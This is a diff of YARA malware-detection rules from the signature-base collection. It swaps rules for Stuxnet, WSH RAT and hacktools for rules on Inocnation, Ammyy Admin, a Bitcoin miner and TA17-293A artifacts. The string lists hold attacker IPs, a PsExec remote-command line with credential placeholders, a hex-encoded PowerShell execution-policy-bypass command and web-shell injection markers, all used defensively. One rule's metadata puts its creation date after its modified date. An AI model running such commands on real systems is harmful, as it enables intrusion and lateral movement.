-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6bcf88251c876ef00b2f32cf97456a3e306c2a263d487b0a50216c6e3cc07c6a"
-		hash2 = "70f8789b03e38d07584f57581363afa848dd5c3a197f2483c6dfa4f3e7f78b9b"
+		tags = ""
 
 	strings:
-		$x1 = "SHELL32.DLL.ASLR." fullword wide
-		$s1 = "~WTR4141.tmp" fullword wide
-		$s2 = "~WTR4132.tmp" fullword wide
-		$s3 = "totalcmd.exe" fullword wide
-		$s4 = "wincmd.exe" fullword wide
-		$s5 = "http://www.realtek.com0" fullword ascii
-		$s6 = "{%08x-%08x-%08x-%08x}" fullword wide
+		$str1_alt = "(Class<?>) method.invoke(" ascii wide
+		$str2 = "(\"yv66vg" ascii wide
+		$str3 = "request.getSession().getServletContext" ascii wide
+		$str4 = ".getClass().getDeclaredField(" ascii wide
+		$str5 = "new FilterDef();" ascii wide
+		$str6 = "new FilterMap();" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 150KB and ( $x1 or 3 of ( $s* ) ) ) or ( 5 of them )
+		all of them
 }
-rule SIGNATURE_BASE_Stuxnet_Malware_4 : FILE
+rule SIGNATURE_BASE_Apt_Win32_Dll_Rat_1A53B0Cp32E46G0Qio7 : FILE
 {
 	meta:
-		description = "Stuxnet Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "fd3fa395-15f1-5a11-9740-03b897e4620b"
-		date = "2016-07-09"
+		description = "Detects Inocnation Malware"
+		author = "Fidelis Cybersecurity"
+		id = "1f2250b7-fee4-5031-aeba-90d35319b560"
+		date = "2016-02-15"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L112-L128"
+		reference = "https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_inocnation.yar#L1-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a4ad77490d17cf897c4639f0b9f9473267886e99a94b4f506670207497117764"
+		logic_hash = "824997d8c8845838420f226b60de544f33a50327fa67aea472de6eaf1b6b4492"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "0d8c2bcb575378f6a88d17b5f6ce70e794a264cdc8556c8e812f0b5f9c709198"
-		hash2 = "1635ec04f069ccc8331d01fdf31132a4bc8f6fd3830ac94739df95ee093c555c"
+		hash1 = "75d3d1f23628122a64a2f1b7ef33f5cf"
+		hash2 = "d9821468315ccd3b9ea03161566ef18e"
+		hash3 = "b9af5f5fd434a65d7aa1b55f5441c90a"
 
 	strings:
-		$x1 = "\\objfre_w2k_x86\\i386\\guava.pdb" ascii
-		$x2 = "MRxCls.sys" fullword wide
-		$x3 = "MRXNET.Sys" fullword wide
+		$s1 = { c7 [2] 64 00 63 00 c7 [2] 69 00 62 00 c7 [2] 7a 00 7e 00 c7 [2] 2d 00 43 00 c7 [2] 59 00 2d 00 c7 [2] 3b 00 23 00 c7 [2] 3e 00 36 00 c7 [2] 2d 00 5a 00 c7 [2] 42 00 5a 00 c7 [2] 3b 00 39 00 c7 [2] 36 00 2d 00 c7 [2] 59 00 7f 00 c7 [2] 64 00 69 00 c7 [2] 68 00 63 00 c7 [2] 79 00 22 00 c7 [2] 3a 00 23 00 c7 [2] 3d 00 36 00 c7 [2] 2d 00 7f 00 c7 [2] 7b 00 37 00 c7 [2] 3c 00 3c 00 c7 [2] 23 00 3d 00 c7 [2] 24 00 2d 00 c7 [2] 61 00 64 00 c7 [2] 66 00 68 00 c7 [2] 2d 00 4a 00 c7 [2] 68 00 6e 00 c7 [2] 66 00 62 00 }
+		$s2 = { c7 [2] 23 00 24 00 c7 [2] 24 00 33 00 c7 [2] 38 00 22 00 c7 [2] 00 00 33 00 c7 [2] 24 00 25 00 c7 [2] 3f 00 39 00 c7 [2] 38 00 0a 00 c7 [2] 04 00 23 00 c7 [2] 38 00 00 00 c7 [2] 43 00 66 00 c7 [2] 6d 00 60 00 c7 [2] 67 00 52 00 c7 [2] 6e 00 63 00 c7 [2] 7b 00 67 00 c7 [2] 70 00 00 00 c7 [2] 43 00 4d 00 c7 [2] 44 00 00 00 c7 [2] 0f 00 43 00 c7 [2] 00 00 50 00 c7 [2] 49 00 4e 00 c7 [2] 47 00 00 00 c7 [2] 11 00 12 00 c7 [2] 17 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 10 00 0e 00 c7 [2] 11 00 06 00 c7 [2] 44 00 45 00 c7 [2] 4c 00 00 00 }
+		$s3 = { 66 [4-7] 0d 40 83 f8 44 7c ?? }
+		$s4 = { 66 [4-7] 14 40 83 f8 14 7c ?? }
+		$s5 = { 66 [4-7] 56 40 83 f8 2d 7c ?? }
+		$s6 = { 66 [4-7] 20 40 83 f8 1a 7c ?? }
+		$s7 = { 80 [2-7] 2e 40 3d 50 02 00 00 72 ?? }
+		$s8 = "%08x%08x%08x%08x" wide ascii
+		$s9 = "WinHttpGetIEProxyConfigForCurrentUser" wide ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and 1 of them ) or ( all of them )
+		( uint16( 0 ) == 0x5A4D or uint32( 0 ) == 0x464c457f ) and ( all of them )
 }
-rule SIGNATURE_BASE_Stuxnet_Maindll_Decrypted_Unpacked
+rule SIGNATURE_BASE_BTC_Miner_Lsass1_Chrome_2 : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file maindll.decrypted.unpacked.dll_"
+		description = "Detects a Bitcoin Miner"
 		author = "Florian Roth (Nextron Systems)"
-		id = "7009a41c-0588-5392-ae1c-045e0a5ee56b"
-		date = "2016-07-09"
+		id = "7960d96a-7bd3-5135-867d-e39a02274c45"
+		date = "2017-06-22"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L130-L150"
+		reference = "Internal Research - CN Actor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_group_btc.yar#L10-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "bec740cdb4c1748d0fb546691cf8feb38c0e61adad60c069c5866f5034cb7ed9"
-		score = 75
+		logic_hash = "ef80dba71c901d6e821b2e08a701a82f8147e41a8f14c5fd324d5e043b0ff322"
+		score = 60
 		quality = 85
-		tags = ""
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4c3d7b38339d7b8adf73eaf85f0eb9fab4420585c6ab6950ebd360428af11712"
+		super_rule = 1
+		hash1 = "048e9146387d6ff2ac055eb9ddfbfb9a7f70e95c7db9692e2214fa4bec3d5b2e"
+		hash2 = "c8db8469287d47ffdc74fe86ce0e9d6e51de67ba1df318573c9398742116a6e8"
 
 	strings:
-		$s1 = "%SystemRoot%\\system32\\Drivers\\mrxsmb.sys;%SystemRoot%\\system32\\Drivers\\*.sys" fullword wide
-		$s2 = "<Actions Context=\"%s\"><Exec><Command>%s</Command><Arguments>%s,#%u</Arguments></Exec></Actions>" fullword wide
-		$s3 = "%SystemRoot%\\inf\\oem7A.PNF" fullword wide
-		$s4 = "%SystemRoot%\\inf\\mdmcpq3.PNF" fullword wide
-		$s5 = "%SystemRoot%\\inf\\oem6C.PNF" fullword wide
-		$s6 = "@abf varbinary(4096) EXEC @hr = sp_OACreate 'ADODB.Stream', @aods OUT IF @hr <> 0 GOTO endq EXEC @hr = sp_OASetProperty @" wide
-		$s7 = "STORAGE#Volume#1&19f7e59c&0&" fullword wide
-		$s8 = "view MCPVREADVARPERCON as select VARIABLEID,VARIABLETYPEID,FORMATFITTING,SCALEID,VARIABLENAME,ADDRESSPARAMETER,PROTOKOLL,MAXLIMI" ascii
+		$x1 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
+		$x2 = "-O, --userpass=U:P    username:password pair for mining server" fullword ascii
 
 	condition:
-		6 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 6000KB and 1 of them )
 }
-rule SIGNATURE_BASE_Stuxnet_S7Hkimdb : FILE
+rule SIGNATURE_BASE_CN_Actor_RA_Tool_Ammyy_Mscorsvw : FILE
 {
 	meta:
-		description = "Stuxnet Sample - file s7hkimdb.dll"
+		description = "Detects Ammyy remote access tool"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e4cb277f-5eee-5405-9d48-d06657392323"
-		date = "2016-07-09"
+		id = "71a0c5a9-b4dc-508d-a6b7-4b85b75bc34b"
+		date = "2017-06-22"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxnet.yar#L152-L188"
+		reference = "Internal Research - CN Actor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_group_btc.yar#L29-L45"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a44063b6a542eca17f46802e9f644540f1d6b6cb9777c20ef9ea14e44c341a1c"
+		logic_hash = "c4b64b3aa63d80fa1a73b021bf49539af5888f53090555555c1f3fd7fbb90230"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4071ec265a44d1f0d42ff92b2fa0b30aafa7f6bb2160ed1d0d5372d70ac654bd"
+		hash1 = "1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed"
+		hash2 = "d9ec0a1be7cd218042c54bfbc12000662b85349a6b78731a09ed336e5d3cf0b4"
 
 	strings:
-		$x1 = "S7HKIMDX.DLL" fullword wide
-		$op1 = { 8b 45 08 35 dd 79 19 ae 33 c9 8b 55 08 89 02 89 }
-		$op2 = { 74 36 8b 7f 08 83 ff 00 74 2e 0f b7 1f 8b 7f 04 }
-		$op3 = { 74 70 81 78 05 8d 54 24 04 75 1b 81 78 08 04 cd }
+		$s1 = "Please enter password for accessing remote computer" fullword ascii
+		$s2 = "Die Zugriffsanforderung wurde vom Remotecomputer abgelehnt" fullword ascii
+		$s3 = "It will automatically be run the next time this computer is restart or you can start it manually" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and $x1 and all of ( $op* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 4000KB and 3 of them )
 }
-rule SIGNATURE_BASE_MAL_Wshrat_Dotnet_Packer_Feb21 : FILE
+rule SIGNATURE_BASE_CN_Actor_Ammyyadmin : FILE
 {
 	meta:
-		description = "Yara Rule for WSH rat .NET packer of February 2021 "
-		author = "Yoroi Malware ZLab"
-		id = "62e043fc-7d13-5b91-9fdd-e71d91194da2"
-		date = "2021-03-09"
+		description = "Detects Ammyy Admin Downloader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "08ffb61a-e2de-538e-9d9f-040276324af9"
+		date = "2017-06-22"
 		modified = "2023-12-05"
-		reference = "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wsh_rat.yar#L1-L17"
+		reference = "Internal Research - CN Actor"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_cn_group_btc.yar#L47-L61"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "18159b140c314a00111fb9453e60d19c11633628a4fe2ad8299b839165b39424"
-		score = 75
+		logic_hash = "b628c7e6debdd2b21a321dc2ec5838fd56107f4cac21bda8b9faa1c1d5b23b71"
+		score = 60
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1831806fc27d496f0f9dcfd8402724189deaeb5f8bcf0118f3d6484d0bdee9ed"
 
 	strings:
-		$a1 = { BE DD 60 8C 34 49 9A 54 D2 40 }
-		$a2 = { 1D D7 24 22 47 A6 B1 A5 }
-		$a3 = { 13 30 03 00 07 00 00 00 01 }
-		$a4 = { 11 02 03 7D 78 00 00 04 2A }
-		$a5 = { A8 8A F4 C8 61 2B CA 07 }
-		$a6 = { 15 AE 5E AB 5A 20 FE B5 56 B4 61 2B BB 06 2A}
+		$x2 = "\\Ammyy\\sources\\main\\Downloader.cpp" ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_LNX_Byteencoder_Jan25 : FILE
+rule SIGNATURE_BASE_TA17_293A_Malware_1
 {
 	meta:
-		description = "Detects Linux binaries that encode bytes by splitting them into upper and lower nibbles and mapping them to custom lookup tables, seen being used by SEASPY and Bluez backdoors"
-		author = "MalGamy (Nextron System)"
-		id = "4866348a-2129-5f6a-9498-8ab1acfa74b4"
-		date = "2025-01-23"
-		modified = "2025-03-20"
-		reference = "https://www.securityweek.com/newly-discovered-turla-malware-targets-linux-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/seaspy_backdoor_jan25.yar#L1-L22"
+		description = "inveigh pen testing tools & related artifacts"
+		author = "US-CERT Code Analysis Team (modified by Florian Roth)"
+		id = "297611c9-f4b1-5618-bd43-5a7444365727"
+		date = "2017-07-17"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L14-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "3e0312ce8d0c1e5c192dbb93cac4770a1205c56dc9d02a0510c7e10a15251de5"
-		hash = "301d58a6a1819466e77209dbf8ca635cbee3b45516e5ee228fea50ae4a27b7d5"
-		hash = "957c0c135b50d1c209840ec7ead60912a5ccefd2873bf5722cb85354cea4eb37"
-		hash = "5e3c128749f7ae4616a4620e0b53c0e5381724a790bba8314acb502ce7334df2"
-		hash = "b0b83e1c69aa8df6da4383230bef1ef46e09f3bf26cec877eac53a9d48dc53ca"
-		hash = "d21b40645e33638bd36b63582c2c6ad5e8230c731236a54e8e5f4139bad31fdf"
-		logic_hash = "c0fe841681d3aaa8687c95f475f68b2d8b2f26afe42e9d15c601602fcc5e50cb"
-		score = 75
-		quality = 85
-		tags = "FILE"
+		logic_hash = "408297496dfb1cc28e1caa7faaf8537b7970bb1742e1b373175f8273fe11f19d"
+		score = 50
+		quality = 75
+		tags = ""
+		hash0 = "61C909D2F625223DB2FB858BBDF42A76"
+		hash1 = "A07AA521E7CAFB360294E56969EDA5D6"
+		hash2 = "BA756DD64C1147515BA2298B6A760260"
+		hash3 = "8943E71A8C73B5E343AA9D2E19002373"
+		hash4 = "04738CA02F59A5CD394998A99FCD9613"
+		hash5 = "038A97B4E2F37F34B255F0643E49FC9D"
+		hash6 = "65A1A73253F04354886F375B59550B46"
+		hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"
+		hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"
+		hash9 = "722154A36F32BA10E98020A8AD758A7A"
+		hash10 = "4595DBE00A538DF127E0079294C87DA0"
 
 	strings:
-		$op1 = {8B 45 FC 48 63 D0 48 8B 45 A8 48 01 C2 8B 45 BC C1 F8 04 83 E0 0F 48 98 0F B6 44 05 E0 88 02}
-		$op2 = {8B 45 FC 48 98 48 8D 50 01 48 8B 45 A8 48 01 C2 8B 45 BC 83 E0 0F 48 98 0F B6 44 05 C0 88 02}
+		$n1 = "file://"
+		$ax1 = "184.154.150.66"
+		$ax2 = "5.153.58.45"
+		$ax3 = "62.8.193.206"
+		$ax4 = "/pshare1/icon"
+		$ax5 = "/ame_icon.png"
+		$ax6 = "/1/ree_stat/p"
+		$s1 = "(g.charCodeAt(c)^l[(l[b]+l[e])%256])"
+		$s2 = "for(b=0;256>b;b++)k[b]=b;for(b=0;256>b;b++)"
+		$s3 = "VXNESWJfSjY3grKEkEkRuZeSvkE="
+		$s4 = "NlZzSZk="
+		$s5 = "WlJTb1q5kaxqZaRnser3sw=="
+		$x1 = { 87D081F60C67F5086A003315D49A4000F7D6E8EB12000081F7F01BDD21F7DE }
+		$x2 = { 33C42BCB333DC0AD400043C1C61A33C3F7DE33F042C705B5AC400026AF2102 }
+		$x3 = "fromCharCode(d.charCodeAt(e)^k[(k[b]+k[h])%256])"
+		$x4 = "ps.exe -accepteula \\%ws% -u %user% -p %pass% -s cmd /c netstat"
+		$x5 = { 22546F6B656E733D312064656C696D733D5C5C222025254920494E20286C6973742E74787429 }
+		$x6 = { 68656C6C2E657865202D6E6F65786974202D657865637574696F6E706F6C69637920627970617373202D636F6D6D616E6420222E202E5C496E76656967682E70 }
+		$x7 = { 476F206275696C642049443A202266626433373937623163313465306531 }
+		$x8 = { 24696E76656967682E7374617475735F71756575652E4164642822507265737320616E79206B657920746F2073746F70207265616C2074696D65 }
+		$x9 = { 2F73657474696E67732E786D6CB456616FDB3613FEFE02EF7F10F4798E64C54D06A14ED125F19A225E87C9FD0194485B }
+		$x10 = { 6C732F73657474696E67732E786D6C2E72656C7355540500010076A41275780B0001040000000004000000008D90B94E03311086EBF014D6F4D87B48214471D2 }
+		$x11 = { 8D90B94E03311086EBF014D6F4D87B48214471D210A41450A0E50146EBD943F8923D41C9DBE3A54A240ACA394A240ACA39 }
+		$x12 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
+		$x13 = { 8C90CD4EEB301085D7BD4F61CDFEDA092150A1BADD005217B040E10146F124B1F09FEC01B56F8FC3AA9558B0B4 }
+		$x14 = "http://bit.ly/2m0x8IH"
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 4MB and all of them
+		($n1 and 1 of ( $ax* ) ) or 2 of ( $s* ) or 1 of ( $x* )
 }
-rule SIGNATURE_BASE_SUSP_LNX_Stackstring_Technique_Jan25 : FILE
+rule SIGNATURE_BASE_TA17_293A_Energetic_Bear_Api_Hashing_Tool : FILE
 {
 	meta:
-		description = "Detects suspicious Linux binaries using stack-based string manipulation techniques, which are often used to generate PTY (pseudo-terminal) device names for stealth or persistence, seen being used by SEASPY and Bluez backdoors"
-		author = "MalGamy (Nextron System)"
-		id = "6c81d8c1-0cfa-54d9-89d3-2b025cc22f13"
-		date = "2025-01-23"
-		modified = "2025-03-20"
-		reference = "https://www.securityweek.com/newly-discovered-turla-malware-targets-linux-systems/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/seaspy_backdoor_jan25.yar#L24-L45"
+		description = "Energetic Bear API Hashing Tool"
+		author = "CERT RE Team"
+		id = "4e58800a-9618-5d8b-954c-e843be6002c2"
+		date = "2026-02-01"
+		modified = "2023-12-05"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L77-L93"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "0e65a80c6331a0e8d7df05ac217a8a7fe03b88f1d304f2ff0a26b92ed89153f3"
-		hash = "3e0312ce8d0c1e5c192dbb93cac4770a1205c56dc9d02a0510c7e10a15251de5"
-		hash = "301d58a6a1819466e77209dbf8ca635cbee3b45516e5ee228fea50ae4a27b7d5"
-		hash = "957c0c135b50d1c209840ec7ead60912a5ccefd2873bf5722cb85354cea4eb37"
-		hash = "5e3c128749f7ae4616a4620e0b53c0e5381724a790bba8314acb502ce7334df2"
-		hash = "654b7c5b667e4d70ebb5fb1807dcd1ee5b453f45424eb59a287d86ad8d0598a1"
-		hash = "ac6a8ec0b92935b7faab05ca21a42ed9eecdc9243fcf1449cc8f050de38e4c4f"
-		logic_hash = "6efc2d7bd6ba1f39554bd6c378e5adb209419c90192fcba0a676b557e5b920b5"
+		logic_hash = "5f8a770c727cdd2d32d7cd1ad45ee8b37f7fc63c9e7f4311d318eb15d9050909"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		assoc_report = "DHS Report TA17-293A"
 
 	strings:
-		$op1 = {C7 45 E0 70 71 72 73 C7 45 E4 74 75 76 77 C7 45 E8 78 79 7A 61 C7 45 EC 62 63 64 65 C6 45 F0 00 C7 45 C0 30 31 32 33 C7 45 C4 34 35 36 37 C7 45 C8 38 39 61 62 C7 45 CC 63 64 65 66}
+		$api_hash_func_v1 = { 8A 08 84 C9 74 ?? 80 C9 60 01 CB C1 E3 01 03 45 10 EB ED }
+		$api_hash_func_v2 = { 8A 08 84 C9 74 ?? 80 C9 60 01 CB C1 E3 01 03 44 24 14 EB EC }
+		$api_hash_func_x64 = { 8A 08 84 C9 74 ?? 80 C9 60 48 01 CB 48 C1 E3 01 48 03 45 20 EB EA }
+		$http_push = "X-mode: push" nocase
+		$http_pop = "X-mode: pop" nocase
 
 	condition:
-		uint32be( 0 ) == 0x7f454c46 and filesize < 4MB and $op1
+		$api_hash_func_v1 or $api_hash_func_v2 or $api_hash_func_x64 and ( uint16( 0 ) == 0x5a4d or $http_push or $http_pop )
 }
-rule SIGNATURE_BASE_Mswin_Check_Lm_Group : FILE
+rule SIGNATURE_BASE_TA17_293A_Query_XML_Code_MAL_DOC_PT_2 : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file mswin_check_lm_group.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "be17981a-7cbf-55ac-bc81-9330472fc814"
-		date = "2015-06-13"
-		modified = "2021-03-15"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L9-L28"
+		description = "No description has been set in the source file - Signature Base"
+		author = "other (modified by Florian Roth)"
+		id = "82b0f28a-94b6-52ab-8fd6-cdc05823ac34"
+		date = "2017-10-21"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L95-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "115d87d7e7a3d08802a9e5fd6cd08e2ec633c367"
-		logic_hash = "74be6bd9c6e01cc4ec7785b6950c8cf6acf549c06990a9d1734f4a3487a04ba7"
-		score = 70
+		logic_hash = "8d4c1b23aa8323fa9ddec362bb36e13e5f992883fbf7936b34cf03fe62ee6127"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		name = "Query_XML_Code_MAL_DOC_PT_2"
 
 	strings:
-		$s1 = "Valid_Global_Groups: checking group membership of '%s\\%s'." fullword ascii
-		$s2 = "Usage: %s [-D domain][-G][-P][-c][-d][-h]" fullword ascii
-		$s3 = "-D    default user Domain" fullword ascii
-		$fp1 = "Panda Security S.L." ascii wide
+		$dir1 = "word/_rels/settings.xml.rels"
+		$bytes = {8c 90 cd 4e eb 30 10 85 d7}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 380KB and all of ( $s* ) and not 1 of ( $fp* )
+		uint32( 0 ) == 0x04034b50 and $dir1 and $bytes
 }
-rule SIGNATURE_BASE_WAF_Bypass : FILE
+rule SIGNATURE_BASE_TA17_293A_Query_XML_Code_MAL_DOC : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file WAF-Bypass.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "d9f40934-873b-5e73-9198-987966027edc"
-		date = "2015-06-13"
+		description = "No description has been set in the source file - Signature Base"
+		author = "other (modified by Florian Roth)"
+		id = "82b0f28a-94b6-52ab-8fd6-cdc05823ac34"
+		date = "2017-10-21"
 		modified = "2023-12-05"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L30-L48"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L108-L120"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "860a9d7aac2ce3a40ac54a4a0bd442c6b945fa4e"
-		logic_hash = "e66d51b465e5d919555084d299a22f07a949a0a9adf4a3f246f6b5222d39b91a"
+		logic_hash = "fb3a84b66554e6c286ba64046d9b18a819f81108ee965862f288637ccee816d2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		name = "Query_XML_Code_MAL_DOC"
 
 	strings:
-		$s1 = "Email: blacksplitn@gmail.com" fullword wide
-		$s2 = "User-Agent:" fullword wide
-		$s3 = "Send Failed.in RemoteThread" fullword ascii
-		$s4 = "www.example.com" fullword wide
-		$s5 = "Get Domain:%s IP Failed." fullword ascii
-		$s6 = "Connect To Server Failed." fullword ascii
+		$dir = "word/_rels/" ascii
+		$dir2 = "word/theme/theme1.xml" ascii
+		$style = "word/styles.xml" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 7992KB and 5 of them
+		uint32( 0 ) == 0x04034b50 and $dir at 0x0145 and $dir2 at 0x02b7 and $style at 0x08fd
 }
-rule SIGNATURE_BASE_Guilin_Veterans_Cookie_Spoofing_Tool : FILE
+rule SIGNATURE_BASE_TA17_293A_Query_Javascript_Decode_Function : FILE
 {
 	meta:
-		description = "Chinese Hacktool Set - file Guilin veterans cookie spoofing tool.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "13f78e0b-c975-5879-9af1-8c619d6c94a9"
-		date = "2015-06-13"
-		modified = "2023-01-27"
-		reference = "http://tools.zjqhr.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_cn_hacktools.yar#L50-L67"
+		description = "No description has been set in the source file - Signature Base"
+		author = "other (modified by Florian Roth)"
+		id = "bc206ab3-a86b-5abe-ae84-15abab838d4e"
+		date = "2017-10-21"
+		modified = "2023-12-05"
+		reference = "https://www.us-cert.gov/ncas/alerts/TA17-293A"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ta17_293A.yar#L122-L140"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		hash = "06b1969bc35b2ee8d66f7ce8a2120d3016a00bb1"
-		logic_hash = "5fd136f44ebce28db4f77f2f8730eb67fc4c2d58921b73378b8d87e1444a4b67"
+		logic_hash = "8b42c67bdcdbb7c38128d8956904baa524d155b1e6957c5c1b5bc28fd8a57e8a"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		name = "Query_Javascript_Decode_Function"
 
 	strings:
-		$s0 = "kernel32.dll^G" fullword ascii
-		$s1 = "\\.Sus\"B" ascii
-		$s4 = "u56Load3" fullword ascii
-		$s11 = "O MYTMP(iM) VALUES (" ascii
+		$decode1 = {72 65 70 6C 61 63 65 28 2F 5B 5E 41 2D 5A 61 2D 7A 30 2D 39 5C 2B 5C 2F 5C 3D 5D 2F 67 2C 22 22 29 3B}
+		$decode2 = {22 41 42 43 44 45 46 47 48 49 4A 4B 4C 4D 4E 4F 50 51 52 53 54 55 56 57 58 59 5A 61 62 63 64 65 66 67 68 69 6A 6B 6C 6D 6E 6F 70 71 72 73 74 75 76 77 78 79 7A 30 31 32 33 34 35 36 37 38 39 2B 2F 3D 22 2E 69 6E 64 65 78 4F 66 28 ?? 2E 63 68 61 72 41 74 28 ?? 2B 2B 29 29}
+		$decode3 = {3D ?? 3C 3C 32 7C ?? 3E 3E 34 2C ?? 3D 28 ?? 26 31 35 29 3C 3C 34 7C ?? 3E 3E 32 2C ?? 3D 28 ?? 26 33 29 3C 3C 36 7C ?? 2C ?? 2B 3D [1-2] 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29 2C 36 34 21 3D ?? 26 26 28 ?? 2B 3D 53 74 72 69 6E 67 2E 66 72 6F 6D 43 68 61 72 43 6F 64 65 28 ?? 29}
+		$decode4 = {73 75 62 73 74 72 69 6E 67 28 34 2C ?? 2E 6C 65 6E 67 74 68 29}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1387KB and all of them
+		filesize < 20KB and all of ( $decode* )
 }
-rule SIGNATURE_BASE_Marathontool : FILE
